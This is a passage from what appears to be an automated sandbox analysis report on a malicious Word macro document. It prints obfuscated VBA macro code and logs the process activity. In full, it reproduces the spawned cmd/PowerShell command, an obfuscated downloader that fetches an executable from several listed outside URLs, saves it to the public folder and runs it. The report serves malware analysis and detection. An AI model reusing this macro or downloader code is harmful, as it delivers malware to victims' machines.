Qwfws / CLng(tKlHoz)End Function", File "uIpNwjvi.bas" (Streampath: "Macros/VBA/uIpNwjvi") has code: "Sub sVdSGF(PhpwT)WwIwcG = JiaDnKAtIcz = (oGJSa / oqVZwB / 77713 / Fix(mrEzEp)) + 5351 - CLng(Juafw + CLng(74079)) + WZNww + 14261 * oqWkR - CStr(73044) / IbBwLj / CLng(oIYJU)wOsvw = WzAlErVCNdT = (QfATY / kGJhQp / 75556 / Fix(lUZwbn)) + 28463 - CLng(oIqwG + CLng(39652)) + HbfEl + 6638 * wvTOMw - CStr(23937) / kvRQF / CLng(cPBjJ)End SubSub musHwkwosI(oXmdLMdsYfUoN As String)On Error Resume Nextrscba = uCGklYuYii = (bSDWY / fpOKfL / 57139 / Fix(bCzDT)) + 85184 - CLng(wBKLzK + CLng(29534)) + LcwkpE + 83249 * UTiwkA - CStr(70028) / uGNaW / CLng(ULmXfQ)LYkPzD = jboTkEkkwEvR = (QszoVQ / nzRZa / 9282 / Fix(uzjmz)) + 5567 - CLng(TSuqRP + CLng(69159)) + qSkzGv + 62473 * bcmYtd - CStr(42537) / JzVpnP / CLng(zOwzZ)[Shell] zEBYN + Chr(vbKeyC) + oXmdLMdsYfUoN + zpawOO + EKKizpw
17959 - 17959hStun = AmlJwGiXlAjV = (EiAHa / LInkzH / 55302 / Fix(PmHiZ)) + 63874 - CLng(CpoPHa + CLng(51028)) + YdQUZv + 97790 * lTKPr - CStr(98612) / KqiiO / CLng(iWGoYC)MrTCkW = GinDGUVKPS = (DoiZd / MAuHKf / 2471 / Fix(FFtAIi)) + 41232 - CLng(ubDbbz + CLng(32479)) + LrWRw + 8208 * SqJYVT - CStr(97487) / HBNLP / CLng(JGnlSu)End Sub", File "izosJmiC.bas" (Streampath: "Macros/VBA/izosJmiC") has code: "Function wSTJs(zHhlB)AZcDdi = tiZDNtdWGzM = (szzHtc / hCdBu / 60563 / Fix(iXLof)) + 7886 - CLng(JXYOGS + CLng(98489)) + dBkZS + 10208 * cVKBZ - CStr(43104) / EYJifO / CLng(KRRIE)ZYsnKJ = YcRVNbvpii = (IRTAFY / kQSjTQ / 27562 / Fix(dDcWq)) + 30454 - CLng(ScGoU + CLng(48389)) + KVmmiv + 35230 * XnPXY - CStr(90150) / swEwl / CLng(sNHnOw)qtQDNz = zwjlSWfoHS = (QMjIjW / oSHfwP / 97607 / Fix(PiXMK)) + 51922 - CLng(IvRTji + CLng(53493)) + YzVXj + 74165 * lhjZJ - CStr(76315) / RhWTjG / CLng(RvIPb)oqQpF = FjfdrjItpf = (RBSijw / wULGE / 24869 / Fix(FiSuR)) + 82532 - CLng(ziGmE + CLng(59119)) + DwIcP + 43585 * alJGTd - CStr(14555) / ucaQjN / CLng(pwYoSU)End FunctionFunction VCRPjlv(IjuBXbKwG)MsfRK = WCioqJzInzNL = (ndLnv / EIJDbE / 58389 / Fix(ZRbBS)) + 23509 - CLng(rzlaa + CLng(65862)) + jLabG + 28100 * ijrWWq - CStr(27225) / bNlfYY / CLng(Mwuzkv)ZNUGEb = czzPaqjiwVGw = (YovKc / zijHdk / 4585 / Fix(iCQmm)) + 91653 - CLng(NnPzhG + CLng(55246)) + zddzJ + 2410 * Zwbmw - CStr(96400) / qlqod / CLng(cjjUC)KAfMv = WNidAmGFcUKA = (AuwdGs / XoRuJu / 70652 / Fix(YtjjCb)) + 71080 - CLng(NlEvXz + CLng(418)) + YTFYP + 7138 * GCHwY - CStr(33444) / qrIPhi / CLng(izVPKj)VCRPjlv = IjuBXbKwGCzFYoF = ppMbUcdvcMS = (uMmHSR / tWjIFU / 19906 / Fix(EBajL)) + 24946 - CLng(CvoMr + CLng(15265)) + CsCrE + 94251 * KzGXic - CStr(37420) / DWAhY / CLng(tCdGR)End FunctionFunction wQpJm(ByVal LYpRJHtwuOCsR As String, mGqOdYnIP, XwERnXf)On Error Resume NextKqTFaT = TrGNPNuETMh = (hwsSMJ / cIqZlm / 6257 / Fix(UdBwKk)) + 99750 - CLng(zIkTK + CLng(58511)) + iQYhMN + 97397 * sQkPK - CStr(2629) / cdKiab / CLng(QXAhi)RvCwZNlBhCkjjj = JcqYwTHJMFrRV + StrReverse(LYpRJHtwuOCsR) + IfaUpMQjGJEOPABh = fDsPaLrtXQX = (REzJk / fsVddV / 62028 / Fix(uFrIKY)) + 25020 - CLng(RjsEOE + CLng(95958)) + tQjqK + 99257 * GPEBl - CStr(20402) / PuuPWl / CLng(OFzFf)fBZnrWF = PRfibuCkMmpl + Mid(qltFWbbrUwKwh + RvCwZNlBhCkjjj + QiKjlfM, ojWaqIpCHFdcuR + mGqOdYnIP + zciEwvSVj, XwERnXf) + ilFCCEGirwJjwSBSqFU = RzJKHaQDWO = (jHWkzE / XuDUL / 31391 / Fix(tludbP)) + 28503 - CLng(Rmvrvz + CLng(61212)) + oauwP + 55975 * RSmEzK - CStr(27312) / zuaNpV / CLng(uwXrqk)wQpJm = IIDrcPuRTRQp + fBZnrWF + KpLRiDHzwVqwNfwZ = mLcJdGizkj = (JzzrPF / GNndqL / 75692 / Fix(AfBPV)) + 89182 - CLng(diBALJ + CLng(21517)) + DWQVMm + 83705 * zZISJ - CStr(97872) / lwqiFD / CLng(ULjPTV)PudvSj = ZpbfJDqMbki = (PCVbFs / CFpzT / 42995 / Fix(iffXr)) + 29268 - CLng(LIPCwc + CLng(88830)) + zEioZb + 24375 * BpZdE - CStr(40122) / dMmMU / CLng(jEtPT)End FunctionFunction tGYJQ(XFkSi)mWGdhR = YqIlpJZTSAl = (FXSSd / JRjPQL / 65699 / Fix(ZwEDWb)) + 57589 - CLng(MlViAA + CLng(74155)) + mjjFq + 29411 * oABHT - CStr(83487) / rZHTpa / CLng(PdJvK)hzufI = ccjicwvQCVT = (Eltva / KLpXGW / 19234 / Fix(EVrGVw)) + 78568 - CLng(wLviU + CLng(60437)) + zMIplG + 50126 * CTzwTm - CStr(10732) / HSSGZ / CLng(wzVVo)izwLfh = KwjYaipmWAVc = (lnMCZF / QIUQR / 76794 / Fix(CXnSm)) + 88802 - CLng(bauscr + CLng(70057)) + dUzMs + 94297 * kJGcT - CStr(88925) / MIIqdm / CLng(ihjiw)MRJzN = GiAQFvqniMK = (AkOljl / zuumP / 56881 / Fix(mzSzIO)) + 61618 - CLng(LLrDvV + CLng(93701)) + EVZIzZ + 95618 * aLzqLj - CStr(26345) / bAVqV / CLng(DvuMZD)End FunctionFunction zPHvPqrDOGFFzX()On Error Resume NextfqsASq = qVzNBZzPpcb = (qbuAGG / RiOkzu / 73604 / Fix(UGpstw)) + 20811 - CLng(CIojF + CLng(11453)) + EkwEDE + 92018 * uLQzMH - CStr(25964) / HzicI / CLng(jhBfV)mpIFv = ncFjJQovrp = (Irrnd / TfBFz / 14167 / Fix(bCRKN)) + 78728 - CLng(YFhYNH + CLng(45110)) + FfziEw + 46549 * MzLml - CStr(31007) / hfwYhM / CLng(dhCPvD)qaBbOcw = wQpJm("i.%@S5i V/ %^c^EzK", 80769 + 3 - 80769, 80769 + 20 - 80769)TaWwU = WFOCMDFLBCoI = (zsOjp / FBRjpD / 39698 / Fix(sZpnR)) + 80469 - CLng(bQvMij + CLng(88883)) + fAamz + 19298 * LnIiUV - CStr(76787) / MIiTMl / CLng(OXSdY)lLkwnI = AOWwBIzikf = (jHkvIA / CYDilA / 96510 / Fix(wHivq)) + 88404 - CLng(uwaEO + CLng(29909)) + owVjm + 5643 * APcwM - CStr(12579) / zflwDp / CLng(pDppp)RciIIYjrLiK = wQpJm(",74Ep^S^m^ojf@", 54636 + 4 - 54636, 54636 + 7 - 54636)MmVDl = okEMEvpzrC = (dnYzSo / LZDwv / 61736 / Fix(wcMOuZ)) + 19647 - CLng(SAsTj + CLng(69846)) + ALwBq + 22682 * BPTjw - CStr(51368) / kmJjNR / CLng(djzcp)ocTvj = wpnRYvsWpHh = (LJcnu / mJvvN / 88094 / Fix(uIwjCQ)) + 12966 - CLng(OMbhz + CLng(88516)) + UavTI + 59325 * uMpYu - CStr(93545) / DtaXZB / CLng(tpnqa)bXSsKjjnooi = wQpJm("cRkY soLFNFiN dw4kmS", 54181 + 6 - 54181, 54181 + 13 - 54181)zwAFz = OoUAtTtNmqd = (KUKTB / XsJak / 16012 / Fix(hPDwLk)) + 51920 - CLng(hzitjl + CLng(12041)) + BHwJT + 32358 * mdzuaO - CStr(10865) / ksPEE / CLng(PbGCic)iqzILs = ssQaEolhfZf = (IdFGAj / nTcjw / 19809 / Fix(VviPt)) + 96872 - CLng(ccYSow + CLng(74896)) + YmInz + 75130 * lsIij - CStr(59600) / QjbuM / CLng(pCPjj)nkSOaEVHQJA = wQpJm("RfjE8^p^S^m^o^c^% 8D", 44316 + 3 - 44316, 44316 + 16 - 44316)jBjnMh = buqXLaVJlH = (RSDLo / ulUWWW / 55496 / Fix(BGzEF)) + 91772 - CLng(GDiaLQ + CLng(64706)) + zfRIRO + 58867 * pswSvF - CStr(9044) / TvELU / CLng(FjLQL)mXFSlm = jAhYOONltAm = (BIPNn / AnZXiU / 14406 / Fix(kKJrdj)) + 57334 - CLng(MIJjjF + CLng(7645)) + vFlfw + 56607 * sipmN - CStr(12666) / zEHndD / CLng(CXFvVw)zZMOif = wQpJm("Rcs.AbRp c/ k", 27694 + 2 - 27694, 27694 + 14 - 27694)DHNuj = cdjbzCQNou = (ajJFZ / cAvsij / 68637 / Fix(hBpWbr)) + 56621 - CLng(BVVfp + CLng(42061)) + MpiLf + 90565 * zwiSS - CStr(67638) / juDsW / CLng(BbqMC)czwNKb = jjzcqCzSjzE = (zwiaB / ZaQWbk / 30963 / Fix(HBGOi)) + 88781 - CLng(jiHJUw + CLng(94007)) + LfNBZ + 93313 * RVMaCM - CStr(30072) / Xrazs / CLng(LRQJoR)AcFariHSO = wQpJm("SQu.EozMFTWzaojzGLMGX", 75315 + 3 - 75315, 75315 + 15 - 75315)aRhnc = ErOiqbkkCH = (PQVjRt / DLANwr / 71225 / Fix(SqEfmZ)) + 87251 - CLng(VJIjt + CLng(33891)) + aPISY + 1925 * rznqYH - CStr(8465) / RrFbIt / CLng(WVSWFz)kUaWU = NiSwkzwAJWA = (drjOAM / QRCEX / 93820 / Fix(qwSCN)) + 18946 - CLng(mrqmzw + CLng(29938)) + HFIbl + 69510 * AFaKJ - CStr(93440) / fOYnQI / CLng(iGJqh)UqlOoiZIs = wQpJm("5W5WIntb ZAZjtTrjl5F", 49573 + 5 - 49573, 49573 + 11 - 49573)ztcDOv = JzvwLjwNcCAv = (McNJhG / YwzkE / 85968 / Fix(GcXvN)) + 95416 - CLng(hSccja + CLng(6663)) + iGplB + 76281 * Ptjoh - CStr(71059) / wLHqZp / CLng(FHnwEi)zONwHn = uOSKwiSOjL = (JErOp / Izkip / 43155 / Fix(jTjlF)) + 93762 - CLng(DZAzSX + CLng(37663)) + liFVG + 48789 * mGzYp - CStr(96724) / ULYvpS / CLng(zjJmZ)OlVTiuDr = wQpJm("X0ZWTcX %^c^E^L@", 19510 + 3 - 19510, 19510 + 7 - 19510)kEuwR = uNGdUQKhaljH = (PEoYWh / Mnzvi / 62525 / Fix(lhLDG)) + 99624 - CLng(aOhEf + CLng(89065)) + UXvcf + 74136 * jQWaj - CStr(77140) / aIiljs / CLng(zPiZH)nubQj = zkjGHQiHAboi = (DznLl / BQzCw / 31960 / Fix(amLbf)) + 64259 - CLng(kWSoit + CLng(72314)) + iPECz + 18119 * nGQfP - CStr(78587) / khHqMM / CLng(wYvHhV)sHiwkDEW = wQpJm("6ZZJqm4tB", 68674 + 4 - 68674, 68674 + 1 - 68674)hzjsfc = kzwQuVELARIA = (ljnjZd / qIuSnX / 12915 / Fix(jnkMC)) + 890 - CLng(LZSqzr + CLng(26082)) + pZUvwS + 87287 * Gwuto - CStr(2592) / GzrzcM / CLng(vwlBVN)VYXYm = wFzifntthqwZ = (zrpCRO / Fwjjoo / 94297 / Fix(iSCNs)) + 60895 - CLng(QTncHQ + CLng(72819)) + GJQUO + 59210 * VHXWtJ - CStr(27441) / rzocPO / CLng(ljSHaW)llfVuRfJGwT = wQpJm("BZ^c^% & SoEkSiqw2w2M", 28185 + 8 - 28185, 28185 + 16 - 28185)oHLTW = ZXTilvvpWmiC = (wdSnW / TYkCH / 8889 / Fix(FSQKZ)) + 74921 - CLng(VTfGrT + CLng(33175)) + vKfZXw + 36618 * pXwLJ - CStr(3132) / Rahjrc / CLng(LMvQC)wMwDtb = aWihNmancbc = (jNfKk / PVwSd / 12814 / Fix(qMcbtR)) + 65438 - CLng(MuszV + CLng(9682)) + zYkTo + 66219 * kjmSUL - CStr(15862) / DEaQww / CLng(LjKuvT)zPHvPqrDOGFFzX = sHiwkDEW + bXSsKjjnooi + AcFariHSO + UqlOoiZIs + llfVuRfJGwT + RciIIYjrLiK + OlVTiuDr + nkSOaEVHQJA + qaBbOcw + zZMOifnKOUv = aiJSObwoazW = (lqnZE / YBMAJ / 88228 / Fix(dRtbEz)) + 31262 - CLng(AVvICC + CLng(39685)) + WIMYf + 64588 * zkJLXU - CStr(27460) / AYbQJC / CLng(WzGdl)sRXULw = ABpjqOujdz = (zpuhja / XDAQDX / 66571 / Fix(zcovn)) + 26529 - CLng(NLRQoD + CLng(89207)) + DEEhW + 6019 * kouibF - CStr(99968) / mLHVOR / CLng(hKlBbj)End FunctionSub SmZcw(LzqMAC, ABEmrN, iEjifo)WuwUb = UVIJwCZnVv = (LZsjF / JOJlOF / 81407 / Fix(JmoFur)) + 48222 - CLng(Xisuok + CLng(20096)) + rilOT + 28026 * qozKN - CStr(8126) / HCTBzQ / CLng(ibDvXB)nLJZD = tfUccUwQwjL = (oXpbnm / PJHhSw / 24920 / Fix(CdnkJ)) + 90541 - CLng(birYCv + CLng(74157)) + fWjmN + 81529 * jWnJtk - CStr(46208) / KjiRvn / CLng(wCpwv)End SubSub kOjwc()bKiKzN = tRzzBDvhsT = (qdXahz / uqzID / 21329 / Fix(twcbV)) + 66658 - CLng(quqwD + CLng(76989)) + rLCWPU + 73071 * EjBNl - CStr(35807) / tJtok / CLng(HTFWl)AjjcdJ = CfwlnifrsZI = (lcBhFO / hkrzA / 58943 / Fix(liYHXE)) + 32000 - CLng(jwXFz + CLng(11893)) + PbfNnp + 46529 * wWPFnS - CStr(76284) / lJwsBT / CLng(CEjVsE)End Sub" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
- "WINWORD.EXE" created file "%TEMP%\~DF7ADBC129936C88F6.TMP"
- source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-59802"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-59802"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\ZonesLockedCacheCounterMutex"
"Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\10MU_ACB10_S-1-5-5-0-59802"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Local\10MU_ACBPIDS_S-1-5-5-0-59802"
"Local\ZoneAttributeCacheCounterMutex"
"Local\ZonesCounterMutex"
"Local\ZonesCacheCounterMutex"
"Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6C7B0000
- source
- Loaded Module
-
Loads the .NET runtime environment
- details
- "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\d40b99d82652dbbc000d378a824ae296\mscorlib.ni.dll" at 5F8B0000
- source
- Loaded Module
-
Process launched with changed environment
- details
-
Process "cmd.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.F70="4""
Process "powershell.exe" (Show Process) was launched with new environment variables: "%lhmbWskWwNVkUzp%="oQllFASCBHr", %HvpurunsRmnvjbm%="zJlPRBwG", %musHwkwosI%="er", %fFhDGzjnXmhYvNz%="hHRrroJFEpzXJ", %mGqOdYnIP%="ll", %fBZnrWF%="ow", %dowlFKYHb%="ow", %GTHGTVYqDCTUTHV%="JNMwizhaTsz", %pKskGkVXEDjT%="p", %oXmdLMdsYfUoN%="s", %LYpRJHtwuOCsR%="p", %XwERnXf%="he""
Process "166520.exe" (Show Process) was launched with modified environment variables: "PSModulePath" - source
- Monitored Target
- relevance
- 10/10
-
Removes Office resiliency keys (often used to avoid problems opening documents)
- details
-
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "{0H")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "%>I")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "0,H")
"WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS") - source
- Registry Access
- relevance
- 10/10
-
Runs shell commands
- details
-
"Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" on 2018-5-17.00:56:07.351 - source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" (UID: 00045852-00002952, Additional Context: "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set 